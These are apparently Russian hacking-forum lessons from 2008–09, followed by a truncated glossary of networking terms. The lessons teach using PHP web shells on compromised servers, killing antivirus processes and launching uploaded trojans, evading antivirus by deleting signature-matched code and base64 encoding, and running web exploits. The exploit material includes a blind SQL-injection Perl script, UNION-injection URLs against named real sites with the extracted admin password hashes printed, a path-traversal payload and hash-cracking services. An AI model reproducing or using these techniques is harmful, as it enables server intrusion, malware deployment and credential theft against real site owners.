Software: Apache/2.0.59 (Win32) [link=http://localhost/shells/c99madshell.php#]http://localhost/shells/c99madshell.php#[/link]PHP/5.1.6  //Версия Apache и PHP
uname -a: Windows NT XAKEP9009 5.1 build 2600 // Имя компьютера и Операционная система.
Хакер9009 //Имя пользователя
Safe-mode: OFF (not secure)   //Это настройки сервера (включён ли безопасный режим или нет)
T:\home\localhost\shells\  drwxrwxrwx // Дерриктория где расположен шелл ( полный путь)
Free 22.56 GB of 93.16 GB (24.22%) //Свободное место на Сервере(на кмпе жосткий диск)
Detected drives: [ a ] [ c ][ d ][ e ][ t ] //Локальные(жосткие диски) и не локальные(флешки) диски.
Как вы заметили если на них нажать , то вы можете передвигаться по этим деррикториям\дискам.... скажем диска "C:\\"
----------------------------------------------------------------------------

Как видите ничего сложного....поехали дальше...(а если сложности возникли...то просто попробуйте на практике и я уверен вы всё поймёте!)

3) Listing folder (7 files and 1 folders): //Какие файлы и папки расположены в текущей директории.....
//(почему в текущей? потому как вы можете передвигаться по директориям)

Ниже идут столбцы:
Name - Имя файла или папки. ( Запомните ".." двоеточие означает переход на каталог выше.
Пример: Были "C:\\Programm files" Пишем: "С:\\Programm files\.." оказываемся "С:\\" .А одна точка означает текущий каталог.
Size - Размер или тип(папка - DIR или ссылка - LINK).
Modify - Когда последний раз модифицировали этот файл или папку. (или создали этот файл \ папку ).
Perms - Права на запись(w) или чтение(r). Bсё вместе(и запись и чтение будет rw).
Action - Действия  и здесь есть три пункта
  I - information (информация о файлах и папках)
  E - Edit ( редактировать файлы и папки)
  D - Download (Скачивание файлов)

Чуть ниже расположено поле
Select All - выделить всё (для того чтобы проделать какие то действия)
UnSelect All - снять выделении.
With Selected - это поле означает какие действия будем проделывать с файлами которые выделены....Там есть несколько вариантов....
Delete - удалить
Сut - вырезать
Copy - копировать
Change-mode - изменить права на запись и чтение.
 
Так же если вы будете копировать - вырезать....у вас появится кнопка Paset - вставить....(переходите в любую директорию ...жмёте Paste и тот файл который вы копировали\вырезали...вставиться именно в ту директорию....

4) Сommand Execute
Выполнение команд....

Эта часть Шелла работает полностью с командной строкой....
И тут то мы вспоминаем всемирный вопрос....зачем нам знать Unix для взлома серверов?

А вот зачем....
Попробуйте набрать в поле Enter:

ls

Что вы увидите в поле...
Result of execution this command: // Результат от выполненной команды...

А вот именно! ничего....

А попробуйте набрать вот эту команду:

DIR

Вы увидите что то вроде этого

-----------------------------------------------------
Содержимое папки T:\home\localhost\shells

31.12.2008  14:47    <DIR>          .
31.12.2008  14:47    <DIR>          ..
24.12.2008  21:47            44 283 c99madshell.php
31.12.2008  14:48    <DIR>          clon
25.03.2004  00:55             4 884 KA_uShell.php
04.03.2004  17:05            15 431 r57shell.php
23.10.2003  03:22            91 159 remview.php
18.10.2003  21:15            15 965 result.php
10.12.2003  21:49           208 538 shell.php
31.08.2008  20:55            12 461 wxshell.php
               7 файлов        392 721 байт
               3 папок  24 223 674 368 байт свободно
-----------------------------------------------------

А это две одинаковые команды...только одна исполняется в Unix системах .... а другая в Windows....

Теперь представьте у вас есть доступ к командной строке где стоит Fedora 9 .... а вы не знаете ни одной команды....вот досада то....=) соответственно ничего вы сделать с этим "даром" не сможете....

Поэтому не пренебрегайте и самое главное не бойтесь командной строки...она вам не раз поможет!

Поехали дальше....

Поле Make DIR  означает создание папки Пример: T:\home\localhost\shells\lol  //Создастся папка с именем "lol"
Make file означает создание фала. T:\home\localhost\shells\help.php //Создастся файл (php)
Search искать файл. // Честно говоря плохо работает =-)
Upload загрузить файл на сервер. (в текущую директорию)
GoDIR Прописываем директорию в которую мы хотим пройти....
Go File (Открыть\Скачать файл)
Select Показывает открытые порты у сервака....

//Так же посмотрите SQL и Tools Первое для подключения к Базе данных на сервере...а второе это открытие портов....

Основной функционал мы рассмотрели.....

Теперь давайте рассмотрим для чего нам этот шелл нужен.....

Ситуация...мы получили доступ к админке на любом форуме\сайте...неважно....главное , что мы можем залить Shell
Залили его...и теперь (в зависимости от расставленных прав) мы получаем полноценный доступ к серверу!

Почему я выделил слово Сервер....потому , что на сервере как правило расположен не один сайт.....
А значит...сломав один сайт мы получаем доступ ко всем сайтам расположенных на этом сервере....
Посмотреть Какие сайты расположены на сервере можно тут http://madnet.name/tools/madss/

Теперь имея шелл мы можем пройтись по директориям и отредактировать index (главная страница)
Так же мы можем протроянить этот сервак убив несколько процессов(допустим антивирусы)
Первым делом узнаём процессы(выполняемые на серваке) tasklist почему то у меня в c99madshell.php не сработал....просто вылетел)))
но зато сработал в r57shell.php
(еще одна разновидность шелла хочу заметить...этот шелл старичок и его вы должны знать как никакой другой...хотя бы ради приличия, так что ознакомьтесь с ним...)

После чего зная PID (номер процесса) мы можем завершить его ...набрав команду
taskkill /PID 4444 /T   где 4444 это номер процесса который мы хотим завершить.... "/T" мы пишем для того...чтобы завершить ВСЕдочерние процессы связанные с этим.

Следующий этап будет залитие трояна на сервер и запуск..делается это очень легко....
В Upload выбираем программу (троян) который мы хотим запустить.....
Качаем её на сервер....

После чего выполняем такую команду....
Start troian.exe  где troian.exe это залитый вами троян....

_______________________________________________

Вот и всё сервер мы протроянили....

Еще один из моих любимых Shell кодов является remview.php

Легче этого шелаа я вообще не видел....
Если вы нажмёте на картинку "Молоточек с папкой" , а по другому и не скажешь....
То вы зайдёте в ту часть...где можно отдавать команды....

Shell commands Аналог Сommand Execute // это там где отдаются команды командной строке.

Не пугайтесь увидев это :
#example (remove comments '#'):

#cat /etc/passwd;

#ps -ax

#uname -a

Это просто приведены примеры....

Так же тут есть функция кодирования в разные кодировки....
Universal convert

Вообщем все остальные шеллы очень похожи....если не внешне ....то названиями полей и теперь вы сможете самостоятельно определить к чему какое поле относится...
____________________________________________________________________________________

Но как вы заметили (если у вас стоят антивирусы) то вы даже не сможете залить shell... так как он распознаётся как троян....
и сразу блокируется.....

поэтому давайте поговорим о криптографии...

Сам себе криптор.

Я хочу рассказать вам о основах криптографии....

Опять же...ничего сложного здесь нет...мне казалось криптуют только самые крутые хакеры....познав Perl я понял , что это не так =)
Криптовать может каждый....и я вам это докажу...правда сделаю огаворку...разговор будет весить больше про WEB , чем про программы.

Для того , чтобы понять как криптовать...нам нужно понять как работают антивирусы.
Антивирусы работают по принципу сравнения сигнатур.
Пример: В базе данных антивируса хранится код который является вредоносной программой.(по его мнению)
допустим это будет php код....

<?
echo("I am troi!");
?>

Тогда нам надо обмануть антивирус....и заменить этот код на его синоним...

<?
print("I am troi!");
?>

Это один из способов....(замена на синоним)
Но....для того , чтобы заменять на синоним....нам нужно определить какой именно кусок кода является вирусом\трояном
(по мнению антивируса)

И я это делаю так....

Берём
r57shell.php и разбиваем на несколько кусочков....а именно...

от <? до сюда ?>.
Тоесть разбиваем на части....
Пример:У нас есть файл с содержимым
---------------------------------------
<?
echo("this is troi");
?>
<bоdу>
<h1>LOL</h1>
</bоdу>
<?
$i = 10;
echo("$i");
?>
----------------------------------------

Разбиваем его на несколько кусков....
1)
<?
echo("this is troi");
?>
2)
<bоdу>
<h1>LOL</h1>
</bоdу>
3)
<?
$i = 10;
echo("$i");
?>

После чего сканируем на наличие вирусов каждый из них.....находим вредоносную часть...и заменяем её на синоним....
Или если эта часть кода вам вообще не нужна ....вы можете её удалить....

Что кстати подходит к нашему случаю....с r57shell.php
Оказалось...что антивирус(по крайней мере мой) реагирует на код который распложен между
<!-- don't delete this plz --> я полазил по интернету....что означает этот Джава скрипт код....и узнал что это просто напросто счётчик....=-)
Который нам совсем не нужен)))
Удаляем его....и еще раз проверяем на наличие вирусов...и более это не вредоносная программа\скрипт =-)

Поздравляю! это ваш первый опыт в криптографии (я уверен не последний).

Бывают случаи когда антивирусы ищут не только по Коду....но и по комментариям!
Поэтому Удаляйте все лишние комментарии....(Но из уважения к автору ,который написал скрипт...оставляйте его Ник.)

Так мы и поступим с нашим следующим shell`ом remview.php
Удаляем все комментарии-описания...и получаем еще один не "палящийся" шелл код.

Так же бывают случаи ,когда синонима просто нет!
В этом случае к нам приходит на помощь base64
Это гениальная вещь для того , чтобы закриптовать нужный нам код...

Допустим у нас есть..
----------------------------
<?
$x=10;
$y=12;
$z=$x+$y;
echo("$x+$y=$z");
?>
----------------------------
нам нужно сделать так, чтобы антивирус и писку не издал)))

тогда делаем так....
---------------------------------------------------------------------------------

0

5

<?
$cod="JHg9MTA7DQokeT0xMjsNCiR6PSR4KyR5Ow0KZWNobygiJHgrJHk9JHoiKTsNCg==";
echo base64_encode($cod);
?>
----------------------------------------------------------------------------------

То что я выделил тёмно синим это тот же код....только закодированный в base64
А сделать это можно тут http://www.motobit.com/util/base64-decoder-encoder.asp

Как вы видите...я взял закодированный код в переменную ....и при помощи функции base64_encode декодировал....и вывел её...

Таким образом результат не меняется....а антивирус молчит =-)
Так что вы можете экспериментировать на всём.....

Еще пару способов запутать антивирус....это поменять имена переменным....по вставлять хлама....
Прмер: $a=1; $b=3; $a+$b=$z; //хотя мы этого нигде не используем...

Ну и на последок хочу сказать о компилируемых языках....для вас всё выше описанное подходит.....единственное вам прийдётся туго с base64 там надо скачать и подключить специальную библиотеку которую можно найти тут
http://libb64.sourceforge.net/

А и вот еще что....по экспериментируйте с компиляторами...
Иногда компилятор сам работает как криптор =).

Итог

1)Мы с вами узнали что такое Shell код ...и для чего он нужен на практике рассмотрели его в действии.
2)Наконец поняли почему нам надо учить Unix и не просто поставить и любоваться им....а изучать файловую систему и базовые команды.
3)Теперь если нам покажут Shell мы не будем робеть....и скажем....мне этот шелл не нравиться давай лучше поставим....(название шелла)
4)Узнали как устроены антивирусы...и поняли на сколько они не безупречны....шаг в лева шаг в право....и вирус превращается в дружественную программу
5)Познали основы криптографии.... и я уверен , что мои ученики смогут развить все приведённые способы...
6)Узнали про такой вид кодировки как base64 //Более подробно можете прочитать тут http://ru.wikipedia.org/wiki/Base64
7)И самое главное теперь вы будете более уверенно себя чувствовать в Хакерской терминологии.
______________________________________________________________________________________________

Я вас всех поздравляю с Новым Годом!
Желаю вам всего самого лучшего... и чтобы кризис не затронул вас =)
Удачи!

< Сообщение отредактировано Xakep9009 -- 31.12.2008 21:51:58 >
Урок 16.

Эксплойты

Exploit (Эксплойт) - от Английского слова Эксплуатировать, вообще эксплойт это найденная уязвимость которая очень хорошо описана её автором....то есть как правило автор эксплойта пишет скрипт...который нам нужно чуть чуть подредактировать....чтобы мы могли подставить его под свой случай....(Но это определение не подходит под все эксплойты)....видов эксплойтов очень много...и я постараюсь рассмотреть наиболее актуальные для нас. //У нас будет практика и вы 100% поймёте что такое Эксплойты.

Эксплойты используются для взломов сайтов...для получения удалённого доступа к компьютеру через (уязвимую программу\процесс выполняемый на компьютере\сервере атакуемого) или для полного уничтожения цели(компьютера\сайта).

И в этом Уроке я вас больше буду знакомить с Эксплойтами для сайтов.

Теперь я вам открываю секрет....почему быть взломщиком сайтов так не легко...
И почему Хакеры не всегда могут взломать сайты Фашистов.....Геев или Секты.
Всё дело в том...что Никто из перечисленных (ну наверное кроме геев  не делают сами себе сайты....)
В том плане ....что они используют движки.

И тут мы знакомимся с понятием движки (CMS) - это система управления содержимым.
\\более подробно вы можете прочесть [link=http://ru.wikipedia.org/wiki/%D0%A1%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B0_%D1%83%D0%BF%D1%80%D0%B0%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F_%D1%81%D0%BE%D0%B4%D0%B5%D1%80%D0%B6%D0%B8%D0%BC%D1%8B%D0%BC]тут[/link]<-

То есть движки....это основа сайта....а всё содержимое уже заполняет её владелец.
А как вы понимаете по началу у движков...всё время находят баги....уязвимости...но как вы понимаете эти движки развиваются...и все свои недочёты закрывают.....образно говоря....кого легче прочитать .....роман Дарьи Данцовой...или Войну и мир?....как вы понимаете это не сопоставимые вещи....
Так и тут кого легче взломать? того кто написал свой движок....или использует чужой...испытанный годами....
(поверьте начинающего программиста легче ломануть, по себе знаю, по началу о безопасности никакой речи не идёт....первым делом идёт речь о функциональности...)

Сейчас я покажу вам примеры самых популярных движков...которые "испытаны годами" и очень часто используются.

1) Joomla -> http://www.seo-joomla.net
2) Datalife engine  -> http://www.nullsoft.cc
3) WordPress -> http://maxsite.org/
4) Ucoz -> http://pokemon-ukraine.ucoz.ua/index/0-22
__________________________________
// Это были движки под сайты.....но не всегда движки предоставляют форумы...и вот популярные движки под форумы.

1) phpbb -> http://www.volchat.ru/forum
2) vBulletin -> http://forumishka.net
3) Invision Power Board (IPB) -> http://forum.exler.ru

//Естественно это отнють не все популярные движки...но нам для примера достаточно.=)

Ну вот мы и познакомились с понятием движки...как вы видите...сайты использующие одинаковые движки ничем не отличаются(по дизайну) кроме картинок...

Вот несколько способов как я определяю какой движок(и иногда версию движка) использует сайт.
1)Первым делом всегда смотрю на конец страницы.
"Создателям" сайта\форума иногда бывает даже лень стереть версию и название движка как допустим в примере с http://forumishka.net/ открываем и смотрим в самый конец страницы ....и видим vBulletin® Version 3.7.1 вот и видим...версию и номер движка.....

2)Потом смотрю на дизайн и так же на логотип(при адресной строке...там картинка маленькая это и есть логотип от форума\сайта)
\\когда немного наберёте опыта, а это будет очень скоро...вы сможете одним взглядом сказать на каком движке расположен тот или иной сайт.

3)После этого я смотрю на исходный код строницы....
Как в примере с http://www.nullsoft.cc ....в мета теге лежит вот что "DataLife Engine Nulled by M.I.D-Team"
\\Опять же опытные Хакеры могут по исходному коду определить не только название, но и версию! этого движка...что очень важно...(версия)

Теперь вы знаете почему не всё так просто...при взломе фашистских сайтов....если бы они делали движок сами.....то у них бы сайтов вообще не существовало... 

Но где плюсы там и минусы....
Так как этот движок может использовать любой проходимец....хакеры этим пользуются и ставят себе этот движок "для тест драйва"(проверки на прочность). И если этот движок не прошёл эту проверку....отсюда появляется Эксплойт! о котором мы сейчас поговорим в плотную!

Самые популярные хакерские сайты где выкладывают самые свежие Эксплойты являются.
http://milw0rm.com
http://www.securitylab.ru

Так же есть поисковик эксплойтов.

http://madnet.name/tools/bugsearch/

Теперь мы знаем где взять эксплойты...
Давайте познакомимся какие виды эксплойтов бывают.

Программыне\процессные эксплойты (эти эксплойты могут осуществляться при определённых условиях, допустим на удалённой машине установлена та или иная программа) проще говоря эти эксплойты написаны для определённых программ\процессов.
//(сюда входят драйверы,установленные программы)

Так же отдельно можно выделить Эксплойты для Браузеров.
Эти эксплойты используются в таких целях
1)Чтобы браузер самостоятельно скачал открыл и запустил программу.
2)Для запудривание мозгов...в статье про фейк я приводил пример ....там где нужно было спрятать ссылку....(чтобы при наведении на ссылку в левом нижнем окне отображалась фейковская ссылка(неправильная))
3)Для отказа браузера в работе.....(чтобы он вылетал...или писал критические ошибки)
4)Так же чтобы ваш браузер перед тем как вы попали на нормальную (вашу ссылку) он переходил по еще 100 штукам))))
\\Пример: Вы заразили свой браузер...и теперь когда вы в адресной строке набираете google.com он переходит по sex.com , nosex.com , nogetro.com итд. и только потом на google.com.
Есть еще много разных видов эксплойтов ...под браузеры...под разные цели...но я назвал основные.

Эксплойты под Операционные Системы.
Эти эксплойты в основном используются для получения удалённого доступа...поднятия прав до привелигерованного пользователя (Администратор\root) или отказа в обслуживании//Смерть системы...

И наконец эксплойты под WEB
Как я уже сказал....сюда входят уязвимости движков.

И в этой категории есть несколько видов(подкатегорий) эксплойтов.

1)XSS
2)XSRF
3)SQL inj
4)php include

Про два из них...вы уже должны хорошо знать....
А вот про 3ий и 4 пункт я вам пока не рассказывал...
__________________________________________________________________________

После долгой Теории без которой вы бы не обошлись....
Переходим к практике

Рассмотрим на примере эксплойта -> XSS \ SQL inj
http://milw0rm.com/exploits/7672 <-вот эксплойт

Восновном ХSS уязвимости рассматриваются в таком виде...
Exploit(XSS):profile.php?user_id=29&auction_id=9[XssCode]  Что означает [Exploit(XSS)] - это всё что идёт до вот этого пути profile.php?user_id=29&auction_id=9

А эта часть [XssCode] это наш ядовитый код))))который мы используем....

В этом эксплойте автор нам любезно привёл пример....
http://www.phpauctions.info/demo/profil … t>alert(1);</sсriрt>
Но это бывает редко....(эксплойты с примерами)

Как мы видим ...в этом эксплойте описано несколько уязвмостей .....и приведён пример с SQL inj

Вот пример.....
[link=http://www.phpauctions.info/demo/profile.php?user_id=-29%20union%20select%201,concat%28id,char%2858%29,username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers--]http://www.phpauctions.info/demo/profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers--[/link]

перейдя по ссылке вы найдете вот что....
10:admin:0cc1e6f7500e16099a4b17534136f1e1
Это Логин и Хеш от пароля....этого сайта....
admin - это логин , а через точку с запятой расположен хеш.... 0cc1e6f7500e16099a4b17534136f1e1
Этот хешь(масса) закодирован в md5 кодировку....про которую вы можете более подробно узнать тут
http://ru.wikipedia.org/wiki/MD5

Могу сказать...что md5 это моя головная боль))) хеш это предпоследняя стадия взлома.... =) до логина и пароля..админа....
то есть разкодировать хеш....то у нас будет админка сайта....

Сделать это в большинстве случаев можно при помощи online md5 декодеров....вот мои самые любимые
http://gdataonline.com/seekhash.php
https://hashcracking.info/index.php
http://passcracking.com/index.php
______________________________________
Но к сожалению они не всегда дают результат.....поэтому есть еще один вариант ....это скачать программу BarsWF с официального сайта  [link=http://3.14.by/ru/md5%C2%A0]http://3.14.by/ru/md5 [/link] и брутить пароль при помощи этой программы....(на сайте дана инструкция по применению)
//Отдельное спасибо моему другу про то, что он мне о этой проге рассказал.

Так-с поехали дальше....

В этом же эксплойте вы видите...
"Perl Exploit:"
и какой то непонятный скрипт....

Успокойтесь всё не так страшно как вам кажется....=)))
Знакомьтесь! это Перловый скрипт!
Он выполняет такую же функцию как приведённая мною выше SQL inj ....

Но только делает это при помощи скрипта(суть работы скрипта заключается в том....что он выдерает с Базы Данных по символу и мы получаем хеш....)

И так....чтобы запустить скрипт...нам нужно иметь Perl интерпретатор....
Если у вас он есть....это очень хорошо))) А если нету....то вам надо установить его вот отсюда
http://soft.softodrom.ru/scr/get.php?id=478 ActivePerl -> это интерпретатор под Windows

И так... Perl это отличный язык программирования....который не требует компиляци...!
И после того как вы установили ActivePerl ....вы можете пользоваться перловыми эксплойтами!(эксплойты написанные на перл)
Отличительная черна языка Perl от всех остальных....это простота....
Все перловые скрипты начинаются вот с этого....
#!/usr/bin/perl это как определитель...где находится сам интерпретатор....(но вы не пугайтесь....сейчас всё поймете...)

Значит нам нужно чтобы у нас заработал перловый скрипт...
1)Создаём любое_имя.txt файл.
2)Записываем туда скрипт.....(копируем)
____________________________________________________________
#!/usr/bin/perl -w

      use strict;

      use LWP::Simple;

      my $a;

  my $host = "http://www.phpauctions.info/demo/profile.php?user_id=";
  #Тут Может писаться любой сайт...потдерживающи этот скрипт....только учтите
  #Что пишится он доконца...тоесть profile.php?user_id= досюда)))

      my @chars = (48..57, 97..102);

 
      for my $i(1..32) {

         foreach my $ord(@chars) {

       

         $a =
get($host."1+and+ascii(substring((select+password+from+PHPAUCTION_adminusers+where+id=10),$i,1))=$ord--");

       

         if($a =~ /coucou/i) {#put the username of the user_id=[id]

           syswrite(STDOUT,chr($ord));

           $i++;

           last;

          }

        }

      }
____________________________________________________________
3)Редактируем код под себя
4)Переименовываем любое_имя.txt в любое_имя.pl //Расширение pl это означает что это перловый файл)
5)Запускаем скрипт.....и у нас в терминале будет появляться (по одной букавке) хеш.....
______________________________________________________
Убедительная просьба....не используйте скрипт до конца....(я имею ввиду....запустите его....посмотрите как он работает (до 3х букв максимум) ибо когда идёт перебор....посылаются "некорректные" запросы...и они остаются в логах у админа....представьте ...если хотя-бы 100 человек попробует этот скрипт до конца....то админ....даже если он лаймер)))всёравно заметит...и закроет дыру.
______________________________________________________

В любом случае я вам просто показал как можно использовать эксплойты написанные на Perl.

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Вы еще что то не поняли....тогда вот еще пример использования эксплойта.....

Рассмотрим следующий эксплойт написанный для joomla!
http://milw0rm.com/exploits/5729

Как вы видите этот эксплойт написан для Joomla которая поддерживает радио или видео.
Так же, если вы заметили , то тут как в первом случае примеров нету...Поэтому я нашёл сам...=)
Примеры использования эксплойта:
1) http://ural-fan.ru/index.php?option=com_joomradio&amp;&amp;page=show_radio&amp;id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user()%20FROM%20jos_users--
//admin:5983e4c69b1465f771d4c91d265219a5
2)http://www.parustv.com/index2.php?option=com_joomradio&amp;page=show_radio&amp;id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user()%20FROM%20jos_users--
//4Rolny48:017849559a523a3f0923b91a5347d217
3)http://dwg-web.com/index2.php?option=com_joomradio&amp;page=show_radio&amp;id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user()%20FROM%20jos_users--
//jackalll:7f3ff651c487439dd340fdcbc7978191

Вот еще один эксплойт для Joomla
http://milw0rm.com/exploits/5300
И как вы можете заметить ....опять для определённого компонента.... "com_cinema"
Вот примеры...
1)http://www.jac64.com/index.php?option=c … ,32,concat(username,0x3a,password)/**/from/**/jos_users/*
//admin:3d1c26bc6bf804e7ade03bed7438c1cc
2)http://www.horror.it/index.php?option=c … ,32,concat(username,0x3a,password)/**/from/**/jos_users/*
//admin:c67f6752a25481cb01b4cd662be3aa3d

Надеюсь теперь вам стало понятнее....
К сожалению не получилось внятно найти эксплойта на php iclude....(я имею ввиду пример...) а вот эксплойт есть.....
http://milw0rm.com/exploits/7658
Так как вы у меня уже грамотные =) я уверен, что вы разберётесь ...если увидите....что то подобное
Вот пример...
wwwsite.com/admin/admin_words.php?ModName=../../../../../etc/passwd

И вот хорошая статья про PHP include ....
http://www.netzoom.ru/view/533.html

И наконец я вам должен рассказать про то как можно php скрипты открывать через терминал)
Этот способ используют очень часто в мире эксплойтов....вот вам пример такого эксплойта...
http://milw0rm.com/exploits/7611

И так...что нам нужно....
1)Создаём --- Сохраняем экплойт (который приведён выше).Пример  example.php
2)Открываем командную строку
3)Переходим в каталог(директорию), где расположен файл php.exe Так как у вас установлен сервер...для каждого путь индивидуален....у меня этот путь будет C:\WebServers\usr\local\php5 там расположен мой файл php.exe
//Если вы точно не знаете где у вас он расположен прибегаем к поисковику...(Ваш стандартный поисковик файлов)
4)Далее перекидываем файл example.php
5)И прописываем в командной строке...
cd [путь к php.еxe] у меня это будет C:\WebServers\usr\local\php5...
Пример: cd C:\WebServers\usr\local\php5 (жмём энтр)

Следующая команда будет

php.exe example.php

Опять жмём энор и видим ...что этот эксплойт предлагает нам опции....
-u - идонтифекатор пользователя....(у администраторов он обычно под номером 1 )
-s (targen for exploting) -Таргет..это цель....или в нашем случае это сайт... то-есть уязвимый сайт...который мы хотим сломать этим эксплойтом....

Задаём опции
php.exe example.php -s=http:\\site.com\chasti\ -u=1

После того как мы указали правильно параметры...начался брут хеша.....
__________________________________________________________

Итог

1)Мы узнали что такое Exploit и как его используют (для WEB)
2)Узнали почему Хакерам так не легко всё взламывать....и познакомились с понятием "Движок"
3)На практике рассмотрели разные виды эксплойтов под разные движки.
4)Узнали про еще один вид кодирования md5
5)Хоть и чуть чуть....но затронули тему php include (прочитайте ссылку которю я вам дал...)
6)Узнали какие виды эксплойтов бывают....и то что они пишутся под разными языками...(хочу еще добавить ...большинство Эксплойтов пишется под Perl и PHP, так что подумайте какие языки выбирать для обучения .)
7)Ну и наконец научились Запускать эксплойты из под терминала....(Perl & PHP)

_____________________________________________________________________________________________________
Пожалуй самое тяжёлое при написании этого урока ......это было подобрать примеры.....в основном....я ищу уязвимости сам....=)
//Я уверен ,что скоро для вас это тоже станет гораздо удобнее...чем искать експлойты(но знать про них вы обязаны)
Естественно перед этим я проверяю наличие эксплойта...но как правило под то ...что я хочу "позаимствовать" эксплойта нету...
Так же ...мне очень жаль ...что я вас не познакомил с SQL inj перед тем как давать этот урок....=) но я надеюсь что когда мы создадим группу ....уже писать буду не только я ....но и Ученики...либо просто друзья которые захотят писать)))

Надеюсь вы нашли для себя что то новое =)
Удачи!

< Сообщение отредактировано Xakep9009 -- 07.01.2009 2:58:44 >
1),IP-адрес (ай-пи адрес, сокращение от англ. Internet Protocol Address) — уникальный идентификатор (адрес) устройства (обычно компьютера), подключённого к локальной
сети и (или) интернету.IP-адрес представляет собой 32-битовое (по версии IPv4) или 128-битовое (по версии IPv6) двоичное число. Удобной формой записи IP-адреса (IPv4)
является запись в виде четырёх десятичных чисел (от 0 до 255), разделённых точками, например, 192.168.0.1. (или 128.10.2.30 — традиционная десятичная форма
представления адреса, а 10000000 00001010 00000010 00011110 — двоичная форма представления этого же адреса).IP-адреса представляют собой основной тип адресов, на
основании которых сетевой уровень протокола IP передаёт пакеты между сетями. IP-адрес назначается администратором во время конфигурирования компьютеров и
маршрутизаторов.
http://ru.wikipedia.org/wiki/IP-адрес
2).MAC-адрес (от англ. Media Access Control — управление доступом к носителю) — это уникальный идентификатор, сопоставляемый с различными типами оборудования для
компьютерных сетей. Большинство сетевых протоколов канального уровня используют одно из трёх пространств MAC-адресов, управляемых IEEE: MAC-48, EUI-48 и EUI-64.
Адреса в каждом из пространств теоретически должны быть глобально уникальными. Не все протоколы используют MAC-адреса, и не все протоколы, использующие MAC-адреса,
нуждаются в подобной уникальности этих адресов.В широковещательных сетях (таких, как сети на основе Ethernet) MAC-адрес позволяет уникально идентифицировать каждый
узел сети и доставлять данные только этому узлу. Таким образом, MAC-адреса формируют основу сетей на канальном уровне, которую используют протоколы более высокого
(сетевого) уровня. Для преобразования MAC-адресов в адреса сетевого уровня и обратно применяются специальные протоколы (например, ARP и RARP в сетях TCP/IP).
http://ru.wikipedia.org/wiki/MAC-адрес
3).Стек протоколов TCP/IP (англ. Transmission Control Protocol/Internet Protocol) — собирательное название для сетевых протоколов разных уровней, используемых в
сетях. Слово «стек» (англ. stack, стопка) подразумевает, что протокол TCP работает поверх IP.В модели OSI данный стек занимает (реализует) все уровни и делится сам
на 4 уровня: прикладной, транспортный, межсетевой, уровень доступа к сети (в OSI это уровни — физический, канальный и частично сетевой). На стеке протоколов TCP/IP
построено всё взаимодействие пользователей в сети, от программной оболочки до канального уровня модели OSI. По сути это база, на которой завязано всё взаимодействие.
При этом стек является независимым от физической среды передачи данных.
http://ru.wikipedia.org/wiki/TCP/IP
4).FTP (англ. File Transfer Protocol — протокол передачи файлов) — протокол, предназначенный для передачи файлов в компьютерных сетях. FTP позволяет подключаться к
серверам FTP, просматривать содержимое каталогов и загружать файлы с сервера или на сервер; кроме того, возможен режим передачи файлов между серверами (см. FXP).
FTP является одним из старейших прикладных протоколов, появившимся задолго до HTTP, в 1971 году. До начала 90-х годов на долю FTP приходилось около половины трафика
в сети Интернет[источник?]. Он и сегодня широко используется для распространения ПО и доступа к удалённым хостам.Протокол FTP относится к протоколам прикладного
уровня и для передачи данных использует транспортный протокол TCP. Команды и данные, в отличие от большинства других протоколов передаются по разным портам. Порт 20
используется для передачи данных, порт 21 для передачи команд.Протокол не шифруется, при аутентификации передаёт логин и пароль открытым текстом. Если злоумышленник
находится в одном сегменте сети с пользователем FTP, то, используя сниффер, он может перехватить логин и пароль пользователя, или, при наличии специального ПО,
получать передаваемые по FTP файлы без авторизации. Чтобы предотвратить перехват трафика, необходимо использовать протокол шифрования данных SSL, который
поддерживается многими современными FTP-серверами и некоторыми FTP-клиентами.
http://ru.wikipedia.org/wiki/FTP
5).Telnet – один из старейших протоколов Internet. Telnet – сокращение от словосочетания telecommmunications network protocol, что означает «сетевой коммуникационный
протокол». Telnet позволяет пользователям присоединиться к удаленному компьютеру, находящемуся в сети, и работать с ним так, как будто бы работа происходит на
удаленном компьютере.
http://chtotakoe.info/articles/telnet_469.html
6).Прокси-сервер (от англ. proxy — «представитель, уполномоченный») — служба в компьютерных сетях, позволяющая клиентам выполнять косвенные запросы к другим сетевым
службам. Сначала клиент подключается к прокси-серверу и запрашивает какой-либо ресурс (например, e-mail), расположенный на другом сервере. Затем прокси-сервер либо
подключается к указанному серверу и получает ресурс у него, либо возвращает ресурс из собственного кеша (в случаях, если прокси имеет свой кеш). В некоторых случаях
запрос клиента или ответ сервера может быть изменён прокси-сервером в определённых целях. Также прокси-сервер позволяет защищать клиентский компьютер от некоторых
сетевых атак.
http://ru.wikipedia.org/wiki/Proxy_server
7).SOCKS — сетевой протокол, который позволяет клиент-серверным приложениям прозрачно использовать сервисы за межсетевыми экранами (фаерволлами). SOCKS — это
сокращение от «SOCKetS» (сокеты, гнёзда).Клиенты за межсетевым экраном, нуждающиеся в доступе к внешним серверам, вместо этого могут соединяться с SOCKS прокси
сервером. Такой прокси сервер контролирует права клиента для доступа к внешним ресурсам и передаёт запрос к серверу. SOCKS может использоваться и противоположным
способом, разрешая внешним клиентам соединяться с серверами за межсетевым экраном (брандмауэром).В отличие от HTTP прокси серверов, SOCKS передаёт все данные от
клиента, ничего не добавляя от себя, то есть с точки зрения конечного сервера, SOCKS прокси является обычным клиентом. SOCKS более универсален — не зависит от
конкретных протоколов уровня приложений (7-го уровня модели OSI) и базируется на стандарте TCP/IP - протоколе 4-го уровня. Зато HTTP прокси кэширует данные и может
более тщательно фильтровать содержимое передаваемых данных.Этот протокол был разработан Дэвидом Кобласом (David Koblas), системным администратором MIPS Computer
Systems. После того, как в 1992 году MIPS вошла в состав Silicon Graphics (SGI), Коблас сделал доклад о SOCKS на Симпозиуме по Безопасности Usenix (Usenix Security
